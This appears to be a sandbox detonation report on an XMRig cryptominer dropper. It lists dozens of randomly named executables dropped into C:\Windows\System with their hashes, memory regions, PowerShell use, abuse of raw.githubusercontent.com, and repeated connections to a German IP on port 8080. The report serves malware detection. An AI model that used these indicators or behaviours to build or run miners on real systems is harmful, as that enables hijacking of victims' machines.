C:\Windows\System\frsrKAz.exe

C:\Windows\System\acdPRbQ.exe

C:\Windows\System\acdPRbQ.exe

C:\Windows\System\KrTyoSB.exe

C:\Windows\System\KrTyoSB.exe

C:\Windows\System\FTiqzmM.exe

C:\Windows\System\FTiqzmM.exe

C:\Windows\System\LPBfmzV.exe

C:\Windows\System\LPBfmzV.exe

C:\Windows\System\leEEgOX.exe

C:\Windows\System\leEEgOX.exe

C:\Windows\System\axJIPBs.exe

C:\Windows\System\axJIPBs.exe

C:\Windows\System\uIOuQXb.exe

C:\Windows\System\uIOuQXb.exe

C:\Windows\System\uRNirqO.exe

C:\Windows\System\uRNirqO.exe

C:\Windows\System\ZtcfjgS.exe

C:\Windows\System\ZtcfjgS.exe

C:\Windows\System\wfcSstU.exe

C:\Windows\System\wfcSstU.exe

C:\Windows\System\ZVOISEr.exe

C:\Windows\System\ZVOISEr.exe

C:\Windows\System\sHXFiWg.exe

C:\Windows\System\sHXFiWg.exe

C:\Windows\System\ZicwcfX.exe

C:\Windows\System\ZicwcfX.exe

C:\Windows\System\lTidCXQ.exe

C:\Windows\System\lTidCXQ.exe

C:\Windows\System\ONGaJTX.exe

C:\Windows\System\ONGaJTX.exe

C:\Windows\System\vZkZynB.exe

C:\Windows\System\vZkZynB.exe

C:\Windows\System\knvppRD.exe

C:\Windows\System\knvppRD.exe

C:\Windows\System\ZVVUrhB.exe

C:\Windows\System\ZVVUrhB.exe

C:\Windows\System\JHRyhpP.exe

C:\Windows\System\JHRyhpP.exe

C:\Windows\System\yOGHZIC.exe

C:\Windows\System\yOGHZIC.exe

C:\Windows\System\FsOEGiV.exe

C:\Windows\System\FsOEGiV.exe

C:\Windows\System\RdHVIxX.exe

C:\Windows\System\RdHVIxX.exe

C:\Windows\System\zGlACbP.exe

C:\Windows\System\zGlACbP.exe

C:\Windows\System\IWPAYhR.exe

C:\Windows\System\IWPAYhR.exe

C:\Windows\System\UbhgHfy.exe

C:\Windows\System\UbhgHfy.exe

C:\Windows\System\OOMPHCK.exe

C:\Windows\System\OOMPHCK.exe

C:\Windows\System\LNdwnyf.exe

C:\Windows\System\LNdwnyf.exe

C:\Windows\System\fEWfTfL.exe

C:\Windows\System\fEWfTfL.exe

C:\Windows\System\vduFGTp.exe

C:\Windows\System\vduFGTp.exe

C:\Windows\System\YFcmmoD.exe

C:\Windows\System\YFcmmoD.exe

C:\Windows\System\usWzMbt.exe

C:\Windows\System\usWzMbt.exe

C:\Windows\System\SjTJRuR.exe

C:\Windows\System\SjTJRuR.exe

C:\Windows\System\XEXPcEU.exe

C:\Windows\System\XEXPcEU.exe

C:\Windows\System\YSOQEpV.exe

C:\Windows\System\YSOQEpV.exe

C:\Windows\System\aNGPoJY.exe

C:\Windows\System\aNGPoJY.exe

C:\Windows\System\CWymJvE.exe

C:\Windows\System\CWymJvE.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/800-200-0x000000013F840000-0x000000013FC36000-memory.dmp

memory/2808-205-0x000000013F7D0000-0x000000013FBC6000-memory.dmp

memory/2580-208-0x0000000002D10000-0x0000000003106000-memory.dmp

memory/2580-687-0x000000013F5E0000-0x000000013F9D6000-memory.dmp

memory/2580-952-0x000000013FBA0000-0x000000013FF96000-memory.dmp

memory/2812-956-0x000000013FEB0000-0x00000001402A6000-memory.dmp

memory/2408-1365-0x0000000002900000-0x0000000002980000-memory.dmp

memory/2580-953-0x000000013FEB0000-0x00000001402A6000-memory.dmp

memory/2408-1460-0x000000001B3A0000-0x000000001B682000-memory.dmp

memory/2408-1623-0x0000000001D40000-0x0000000001D48000-memory.dmp

memory/2580-198-0x00000000030C0000-0x00000000034B6000-memory.dmp

memory/2044-197-0x000000013FB00000-0x000000013FEF6000-memory.dmp

memory/2580-196-0x000000013FB00000-0x000000013FEF6000-memory.dmp

memory/672-195-0x000000013F520000-0x000000013F916000-memory.dmp

memory/2580-204-0x00000000030C0000-0x00000000034B6000-memory.dmp

memory/2408-183-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp

memory/1660-203-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2580-202-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2580-192-0x00000000030C0000-0x00000000034B6000-memory.dmp

memory/1356-191-0x000000013F2C0000-0x000000013F6B6000-memory.dmp

C:\Windows\system\QdvHMSJ.exe

MD5 b0ed7da08bb84e4d42025b0e08f058ba
SHA1 d240521e8aeacf783ebfdf4dd480360355a18285
SHA256 42d701dab503ca805badefe8731278b03f784125fe74a71c1155c3e7e3e35e57
SHA512 4a1ed0e459c29dcfaaba088758d877dcd13d2f895ebd97c868f0f1bd6b8dd815e156c9f1695bd3915a087a37890425ddf1c3af29a79442b277a2d3bf770993d4

memory/2580-189-0x00000000030C0000-0x00000000034B6000-memory.dmp

memory/2500-188-0x000000013F9F0000-0x000000013FDE6000-memory.dmp

memory/2580-187-0x000000013F9F0000-0x000000013FDE6000-memory.dmp

memory/2660-186-0x000000013F340000-0x000000013F736000-memory.dmp

C:\Windows\system\nCszyir.exe

MD5 fcd2cc1eb04db4e024e88a5056f832cc
SHA1 de36a3431fdd9025db368ab7ce1d50fa25ffdb93
SHA256 902d7db4849bc524622271ff4233a4d36470a51dec640b3ce9f1cf19f358e90e
SHA512 814715b165c968be8dae977793e67dff517603d9c9ed056bef5398cb22299031ca94e34bd3e48383ffebee8bf6b55350cbedf0555e0a298566dd9c347d8f850f

C:\Windows\system\zXipwxX.exe

MD5 1bc326abc0c2a026ca12268367dff887
SHA1 3ee352a6eeeee04acb6ed0d6e6c56ce4097dfaa8
SHA256 950c7689e51b45d4599a6475e8128477b542653e5fed49b6909b67e03b9ccf39
SHA512 0e36ebb7d339d4263432364babfd99e35d577bdce743e96f95bb95165fd98fdd968735feb59538d1e772a0db70eca27451d0122fbca1ec3d2bfb6d4eb5628f71

C:\Windows\system\BfKVuUN.exe

MD5 63049f74b017062c819d589731a14118
SHA1 16088b57ac69a9fc89bf1c36a7850490ffec8274
SHA256 2ce6e1ec805bb2035e2ae40d11bf97ba509f7a101c4f1b7c79f786bd01027241
SHA512 8117a35477b52586a2c62c67dfe88fbbbd2f0baee280175fc09277c2e405038d9e62810a707a4621504b25602aed97834399d8711a9ed04aef11f0bd12a0ca92

C:\Windows\system\fvzbwVd.exe

MD5 f27d0ca350a4de6a15cf45f237f95ca2
SHA1 29ffa675c5c5722119f963a2f3d024a1fbdf84b6
SHA256 7594edb8281391fdc4a69b52ced07ce7a83bf60b6183a55b4f88b2d6659b6144
SHA512 d3c541e167f2ea505023597120faf08c82525c0e627233080aae43912393a5993003d9aeb4a881374ebfacdb63b2c4a15ede24fbeb5c34cefad7cad95bca1b66

C:\Windows\system\IVZhjLr.exe

MD5 9416292a00d4b9ad886166d346488550
SHA1 e5c284279d47130ad1efd9bcf4ba5f45c1da1cde
SHA256 29becd18fc193806f8e1a3dde6080bd54fdd5d7a4c54a72924f3086830e0c47a
SHA512 c91bfd332bc46f21c09f6a76c50f601a2cf87bc713a33b6a9f6ba8fce926d907144c901ce3e508ea242aa1c3d73b7e01fa36be3bb7e0e84cefb241ad8a109ba8

C:\Windows\system\wEGNKMO.exe

MD5 75bc2816fac0cd27e0dc722f83f3d8ac
SHA1 2938451816f2e8de8f378b1c2a212e0265182395
SHA256 d0af4c2a6e234ee24a8150a53b1a8c277812235500f906ead94e2b6ac69fa9d9
SHA512 2acd2e3865bd436423ca5b8d1b00c163e0ab44ff0024159e41f6b7534cbd43fefcb6c86e10d7b862f2dac160c9ebdadb9ba1ed3a4457249322971cf5a0d33620

C:\Windows\system\SgLbZWG.exe

MD5 4d417ad8a2e7cf2f2b13b09dfe44b664
SHA1 b0de7169c0fbd3e88e8d93c209865bdc697cc9c6
SHA256 b2788dd7f237d4f3afddfc8bafbd780e25e37a2824a79697867eb265ab7165c5
SHA512 784300ab8d183a74541318b100beaf881a80606202b228d89908e5eebed502cfe4dbebfe8ceaa74ed573f38b51bf9ecec780e9b64825a4e1c7a7bb6e122cd56f

C:\Windows\system\qItLdOC.exe

MD5 dcc8d3c22710d967ed58aef450d9af84
SHA1 2df3fab2485480c920faa7e728f20d2e6bc5f22f
SHA256 c2fff245d6baba141abe135c2a07b40c5ecb08de463520e84b9b490cbda0ba53
SHA512 d8e8c4dfee3dc6baa4d3f17430c359b79ca6acd9709c4a1fbab59cda9cf358a0f8d79eecb7c47766a54e11b87d145444a9732d1781f4585c86ebfdfc3c3f9224

C:\Windows\system\ASSBonA.exe

MD5 2a35190575b2a69ff56980f67be39d2d
SHA1 bec13b1881c9f3a48946855d2b1b8e0813d698a9
SHA256 ff2b41ef8b4a91edd62370b397247e5de6cba1d9081438ff378d56e9b1335f50
SHA512 a4724479b7daa04b8756831ea6e7627923e573e426d656d87aa5a58206fe098e98a30068877735ca419ed1344941fbaaae7fdb9ab3644fbd360f4c79de44b097

C:\Windows\system\PfiutKR.exe

MD5 f3535a0dbdc1f2797e37262a1875430d
SHA1 0ce63362fe98de6d3d113f7ca68250d937965bd0
SHA256 968ad8ddc1508ab01ffc9a8ee478ab8691caf8992b933fdbb86f8e9d7192f400
SHA512 30721abd8075d6b0dc4f768be12da50cc1b1f7a39918d90a0b538151104e418aa3e38190f44a0440ffe426ab00cef7df59665bf65d432a5f5fb3db7523db9d26

C:\Windows\system\bqWZLju.exe

MD5 68fe7c14fb311e64e1e58a2dfade163b
SHA1 e6b85c87f6e8625c388db29b635bd076912f7a2b
SHA256 b466f3c8094e7983f86f4ca71a9328c9b165e7ecc71dde8b5e04f744e8b56403
SHA512 57d57620316cc791dec08d65ae86d95db822a3adefd50a8ed5d6cba34c85d17c78566b12d70d76476f5d73a93ed7299f791f5c928296f1e8916ad9acc68f3b29

C:\Windows\system\KEpLhzD.exe

MD5 b7d4d67194bcdbb75da37fbeb64a8b18
SHA1 969fb28740efaac4dfed933ee696f5eb1786dda9
SHA256 6e0410e04455bc4ac2ef6a312fc457094f7adec291460ae045a98fb5bf383687
SHA512 94194c3a150b0a71fb9dd4eb6f86cde64a4f687806c241ac311a293e3c46955f050762642786c2aa529e69a2b513e02fbaaaa2c6e4b336086547b98bac5b3177

C:\Windows\system\rnSFVQL.exe

MD5 66176370d36a9381a69a14801a8bb52f
SHA1 9ee4743450578a838ddce19a9cadb3a35552ae77
SHA256 946d59ac1ce71d421ae4e85488e3068d5f876682a9026f1345125a4f2e0dcf7d
SHA512 25860e5e64c81b67840589875104254078d810e1f7aab3f50f1c96dbd00c09f20be8ee32746b3d343f812a3ceb7f733e056c0bb1dab4c97836b030ba501d6db1

C:\Windows\system\TmVgfRA.exe

MD5 4e28a5504512a47773ceae9beecc9aff
SHA1 1d40555bcc5e8330f1ebd66f38e7f68d5026e3c0
SHA256 18412832836df003fb35b7786857e044008ed46aad4634105c9b5b60f9cd689c
SHA512 177d9f9c8f99e10648792c335a0737b5c5eb6d401d5c942e7a03528320509a4992ea4d9189226a08e28ae37000d66236c841a3c9db884f7f5d8be9a758f0ab98

C:\Windows\system\LlaYsrg.exe

MD5 f3311f902f9bad578a2e176ee60d82c1
SHA1 c16aa10e8161f8892c3dc6fe6f0c6592ea75b317
SHA256 f570c65f50f78963ba19fe840fb695cec12844c0a6c5577789f70241553dd146
SHA512 7861b437707bbb3f9e383d57b4bf7fba46c6601ea75bea08f26daa6ef5a7cccc5ebb784d70380116363db58611bc07f449b1081d143c4f23c820e57ffbdbcb0d

C:\Windows\system\HrvPhpR.exe

MD5 2825838aa5a1d35c1fb64f37f7416faf
SHA1 003ddbf74b8e7c7989fd9068555d5b2df22c56db
SHA256 f4f02eb102c7f99ec2757a33f7d9e748523b426ff59ae90c9f788154977b3786
SHA512 8e59a357836b5fac576d19bfa78be99591808f36618dce367d1985cd29da94e6e8a2d97bf0c81cafa86ecbc0e1a2c930907ddedf8c5281c7a988f61ecb5ea107

C:\Windows\system\uedThTv.exe

MD5 2bf6f5bfc137c9906768e903a23a7b7a
SHA1 9fb0f354b716593fd871ff0950368e8e2f9c5b54
SHA256 80df1763217490e69d59c18d4c392f62882b426885f9e4c012c1786399d52665
SHA512 5fe2f8ada7c0270ea2e19c58d5cca40376f36a34bf4d6fd8f8d44ca068fe7797801183788325cb4cd0f1b6e63c39e6f164332394a72f7bae735d6d0d871dd950

C:\Windows\system\ASxtKPG.exe

MD5 ffa8b88a4ee11c99e88e559b629dbf15
SHA1 e2b2bbf6522776dbb6ab32d0123c12d71ef4444d
SHA256 3dcbb55d152b909752186a1d33eb7dafaf3dfcb6f9e188c3b657b36c9176db77
SHA512 9d876025d746cb0a08b114114d1a30d71deeb75fd65535b93f63c8be35b4cd9215a0ec73ddfbaaa6884377be453c849daf953a805415e869323bbae40cf22347

C:\Windows\system\kAaBjcz.exe

MD5 9f9d2a71555ffbdbe6c1b2bd7e7b4d6d
SHA1 010457cddcc187293db67cc97b30e28731ca3477
SHA256 103208befde08f264555ce3c55a1177bafc894864a2359b8fe1eeff72636fdb0
SHA512 e49792c9701f5b8c5c0ff00ae70529f58f142a3359d2b761ea46e57b8c1b6faf1b571c8ca6c54a8c89e3c6f5814e2766ce2e568a9b3fd67546b88ae853b8701b

C:\Windows\system\GaUEMYy.exe

MD5 bd814aabcc9227769d8730fdd7f5c333
SHA1 030ed3ec39cd31689c534336823531ce68ce8cb5
SHA256 2b8b6469817da74c7a1001aabad06b75a62264bbefadb9f674b3f7a4cc174e21
SHA512 7c77963ac9daf2d67a7a5daa7807de79cfeef88f0e1fa1bd3caec13ec7b3af1ad014dc697ab8f2775cda18ee0da99ef47e6d4f727f64cd59b2825235b76a80f0

C:\Windows\system\KTtPfRU.exe

MD5 3d28b822b6321dc8aa6f569329fa800b
SHA1 0f2b5fdec1893a487e677accaa9a769981ffaa62
SHA256 652753cd927bf48085aa6a44e392e66a9ebc30b99c24cf7c72d94ba5cbb1524c
SHA512 2bf1060c1714b4e19fbb7f9f471eb189ce451f0ed06e88ce62bd1e2aaccb2ebcad7450ba42f70f2fe119f920f8e10e95598acf12804d8da0f86fa2839d3f11bc

C:\Windows\system\jzneUsQ.exe

MD5 35c66fc0da4c9457099b8897da2916b5
SHA1 c739f9d5725316ec8ea083e03282393f7aebd337
SHA256 c8a06f809b78fad54a01d6e85927566cd846e113ef1ef2571981893c591f7a29
SHA512 9d72b8f1ea6a3b781b2ad1272be057f87d57b766d0f8a10cd2918de70130764c3059f598031de1481c772cb46975ff4dee04a6ff5e7d0b4b9264da462fe255cb

C:\Windows\system\EVqHuxE.exe

MD5 bdbd2cdc9dc09a6677e2a54b7a8bfda8
SHA1 35a6777a957d0b24562f49193f0e89de6ba09d8f
SHA256 f8638b02321d25b750412662dbf7fa348910af13246090e4d12a4ce535d3034a
SHA512 fe35e444f7fada7b5ef2bc00d39f1df29ddfd7973ba83e5487a186b6db3592748c9792a7a52d4c9425c2458f73186b81b1a69fd25122c07da24a484689d101c6

C:\Windows\system\utCiJhi.exe

MD5 a7e4168ff6224b5e401498f0177396ee
SHA1 16e914963d1cecb60cc6daa5f6f8294b7e76762f
SHA256 39da567463e807deee92423676023c6376236bb74606f62fc05b82b58974d676
SHA512 11e95086a3814f1bba05909a29f27f702e33c6bd507080c20e77dc8607a80f482e4b24de10c0ad88b8c56c8bc30d203f8884dd2091ec41ac0cd030ecb2819084

C:\Windows\system\WaRAAUT.exe

MD5 ac2cf1251e794122f5f03429d833886b
SHA1 971ced9e0eb2d55eeaf533494dbc0b1e403efea8
SHA256 2a8a76cb959ab1f5e6ff659b7e1d9c3db54692ed4c03ab90a3c2711af1019ee6
SHA512 5a6b7f394ff57fbdf25a55e3594adad198e041397f76ba943a64f63728cd56cf4192b6021e91393069b49bdb203ecd3c03d1dc56745a45583c095d7413a80c1e

C:\Windows\system\aaWsMRc.exe

MD5 92f28518db2a0a38403d81c22f004c23
SHA1 126d90f320eef6f6a510f296f03af25ec3bf5f10
SHA256 c8408c9051812a213ec89feecb1294ea325ef7a3c500127a2e48eedc5b00daa0
SHA512 92f4051d1a902268f9a7f45ba31bbfcbfba85a84c291acfb5b73b1f23afb3634229f03cd51878976ab0732c513fea71d8e8461a0e715318472705b56a0f493a7

C:\Windows\system\zXtHaPz.exe

MD5 265f2a6e6c97e256872753109f82a371
SHA1 5deaa1651b8c18e08f9c01ad60aa80c80b3ac024
SHA256 95fdf1d5280eb84073aa43c258fb741affe1537cd104e956d58e170af69ba7ad
SHA512 c733749139ea431fb3e01e36042053ecd9238e42e554b1ab6ce67331480632f9cae920fa1d08c6e1ccbd30e3e828c14ee52f3db6215f0a9ab812d5585084c0d7

memory/2784-35-0x000000013F0D0000-0x000000013F4C6000-memory.dmp

memory/2580-34-0x000000013F0D0000-0x000000013F4C6000-memory.dmp

memory/2408-32-0x000007FEF612E000-0x000007FEF612F000-memory.dmp

memory/2652-31-0x000000013FBA0000-0x000000013FF96000-memory.dmp

C:\Windows\system\MKdGMMI.exe

MD5 16318f6bf5af37a8369ad7eddcfe9268
SHA1 c0cf7b342082849fc6db6b6d897cb9dfead6ad7a
SHA256 f6d90d8864439d8af030c7318020b10b3e94a88ecf4b3a9677cc8f1d49d7d730
SHA512 e0581f3cd918112abed61ed89d6c3535291b575962c59f60ba201894c7e27dad3f9177aa3531296c878eb27d7ec8fb397cb82cdb5e4789777c172cd79938dc36

memory/2812-27-0x000000013FEB0000-0x00000001402A6000-memory.dmp

C:\Windows\system\gKYaTiu.exe

MD5 2b46dbfb7dc71b4fbe768c7902e415d5
SHA1 d1da29de525698bd281b8d8ce1bf775580e09a6f
SHA256 38f0ed38527f2ee1be8d98a77a8d7bbbbd1f8c7906bbb6176ccb0e13a3a34c13
SHA512 3fad2634e19e6131e7220aa5b743d98e7f181732fab50132e71264993b79422fc459a27c2c62dbfb443be60f053c44c3fbeaa96d87439a132d27beb8204a25fa

memory/2636-16-0x000000013FA20000-0x000000013FE16000-memory.dmp

memory/2408-25-0x0000000002900000-0x0000000002980000-memory.dmp

memory/2580-24-0x000000013FEB0000-0x00000001402A6000-memory.dmp

C:\Windows\system\YevrTTm.exe

MD5 4c7a7822fed3f439b5d575591628e2b2
SHA1 72cd485427e8c33dc5d41413930806fd885678ca
SHA256 3b31d062c41592ae1b37515d98704e7344b803e2da8dd6f2db512acf370d1c04
SHA512 6f6ff6213cdb16e7e478731c49f42799f8d8d770067f1837f3dc12a459ee969b8d033ad3b06811bf5b53511415bab36cd4f275ca97f34f65e630547edbad7d08

memory/2580-19-0x000000013FBA0000-0x000000013FF96000-memory.dmp

memory/2580-8-0x000000013FA20000-0x000000013FE16000-memory.dmp

C:\Windows\system\VbFWwuv.exe

MD5 86252738e634daf8f55560113ec67e9d
SHA1 0bfc27d42729256468d44054622ab7709fcf9517
SHA256 8a1a4fcd15017c59f3402893a3a76d1925f6317ff6dcee14c59d089735a2d069
SHA512 28d0011b6b930a6dce51386530309f7f6e61e571b44cdf1d00ff755499dd6ffdd64c3efabfddf60e16606fdd90da947321c0cfc4d89ea508eda2e7830343fc56

memory/2580-2-0x000000013F5E0000-0x000000013F9D6000-memory.dmp

memory/2580-0-0x0000000000200000-0x0000000000210000-memory.dmp

memory/2784-2100-0x000000013F0D0000-0x000000013F4C6000-memory.dmp

memory/2408-2110-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp

memory/2636-2301-0x000000013FA20000-0x000000013FE16000-memory.dmp

memory/2652-2332-0x000000013FBA0000-0x000000013FF96000-memory.dmp

memory/2812-2349-0x000000013FEB0000-0x00000001402A6000-memory.dmp

memory/2660-2461-0x000000013F340000-0x000000013F736000-memory.dmp

memory/1660-2470-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2044-2473-0x000000013FB00000-0x000000013FEF6000-memory.dmp

memory/1356-2467-0x000000013F2C0000-0x000000013F6B6000-memory.dmp

memory/2500-2476-0x000000013F9F0000-0x000000013FDE6000-memory.dmp

memory/800-2477-0x000000013F840000-0x000000013FC36000-memory.dmp

memory/2784-2475-0x000000013F0D0000-0x000000013F4C6000-memory.dmp

memory/672-2478-0x000000013F520000-0x000000013F916000-memory.dmp

memory/2808-2479-0x000000013F7D0000-0x000000013FBC6000-memory.dmp

memory/2580-3063-0x00000000030C0000-0x00000000034B6000-memory.dmp

memory/2408-4004-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 12:56

Reported

2024-06-13 12:59

Platform

win10v2004-20240508-en

Max time kernel

69s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\teqVxIM.exe N/A
N/A N/A C:\Windows\System\FeDaNNH.exe N/A
N/A N/A C:\Windows\System\ZimaJJH.exe N/A
N/A N/A C:\Windows\System\ahORzoo.exe N/A
N/A N/A C:\Windows\System\GgXfWDf.exe N/A
N/A N/A C:\Windows\System\bHbFzOx.exe N/A
N/A N/A C:\Windows\System\pXmlHBd.exe N/A
N/A N/A C:\Windows\System\cKJdSui.exe N/A
N/A N/A C:\Windows\System\xvSuGol.exe N/A
N/A N/A C:\Windows\System\BSNsZhz.exe N/A
N/A N/A C:\Windows\System\eULUwQU.exe N/A
N/A N/A C:\Windows\System\LcOlCeq.exe N/A
N/A N/A C:\Windows\System\liRTNAw.exe N/A
N/A N/A C:\Windows\System\IOihkbv.exe N/A
N/A N/A C:\Windows\System\NULohoJ.exe N/A
N/A N/A C:\Windows\System\NdyrwSR.exe N/A
N/A N/A C:\Windows\System\NojuUMC.exe N/A
N/A N/A C:\Windows\System\wlnfQlw.exe N/A
N/A N/A C:\Windows\System\nalNpft.exe N/A
N/A N/A C:\Windows\System\iTjotIJ.exe N/A
N/A N/A C:\Windows\System\WGUxMdy.exe N/A
N/A N/A C:\Windows\System\pnfJbtm.exe N/A
N/A N/A C:\Windows\System\gfWGAiB.exe N/A
N/A N/A C:\Windows\System\WGUGaOw.exe N/A
N/A N/A C:\Windows\System\FspcJwC.exe N/A
N/A N/A C:\Windows\System\lqUyUzR.exe N/A
N/A N/A C:\Windows\System\faffRMB.exe N/A
N/A N/A C:\Windows\System\cnTGeLE.exe N/A
N/A N/A C:\Windows\System\thYHXrT.exe N/A
N/A N/A C:\Windows\System\YTDxbcK.exe N/A
N/A N/A C:\Windows\System\gBCVGiF.exe N/A
N/A N/A C:\Windows\System\XsIgUMG.exe N/A
N/A N/A C:\Windows\System\yByFYJm.exe N/A
N/A N/A C:\Windows\System\UfFCnhm.exe N/A
N/A N/A C:\Windows\System\dkaeTTv.exe N/A
N/A N/A C:\Windows\System\ojYQXmD.exe N/A
N/A N/A C:\Windows\System\wGMAqDU.exe N/A
N/A N/A C:\Windows\System\zFCqHiH.exe N/A
N/A N/A C:\Windows\System\YrLPJkr.exe N/A
N/A N/A C:\Windows\System\RZwCOCD.exe N/A
N/A N/A C:\Windows\System\HEKxjOL.exe N/A
N/A N/A C:\Windows\System\zInjGgi.exe N/A
N/A N/A C:\Windows\System\wFWtVSm.exe N/A
N/A N/A C:\Windows\System\MZflHfo.exe N/A
N/A N/A C:\Windows\System\fdhwhhK.exe N/A
N/A N/A C:\Windows\System\WWnNoLm.exe N/A
N/A N/A C:\Windows\System\HQCzDJt.exe N/A
N/A N/A C:\Windows\System\lSnqTYA.exe N/A
N/A N/A C:\Windows\System\rYjaoCP.exe N/A
N/A N/A C:\Windows\System\drYFxFz.exe N/A
N/A N/A C:\Windows\System\SCoUOJn.exe N/A
N/A N/A C:\Windows\System\bkWpJYz.exe N/A
N/A N/A C:\Windows\System\EQMfZMt.exe N/A
N/A N/A C:\Windows\System\rPqvdqN.exe N/A
N/A N/A C:\Windows\System\QyxxaNM.exe N/A
N/A N/A C:\Windows\System\CqRIxOl.exe N/A
N/A N/A C:\Windows\System\xhRqJhD.exe N/A
N/A N/A C:\Windows\System\xTsBXhZ.exe N/A
N/A N/A C:\Windows\System\hkmUUVJ.exe N/A
N/A N/A C:\Windows\System\ZQQKcFT.exe N/A
N/A N/A C:\Windows\System\lzEEFmX.exe N/A
N/A N/A C:\Windows\System\aFfXEiy.exe N/A
N/A N/A C:\Windows\System\JTZlyrn.exe N/A
N/A N/A C:\Windows\System\gWwPYxz.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\outOPux.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ilHCBJP.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mYleOed.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pfjHzAh.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AvQTVfh.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ajRHVjf.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WKdZQEI.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tfTXssE.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AlgPsln.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
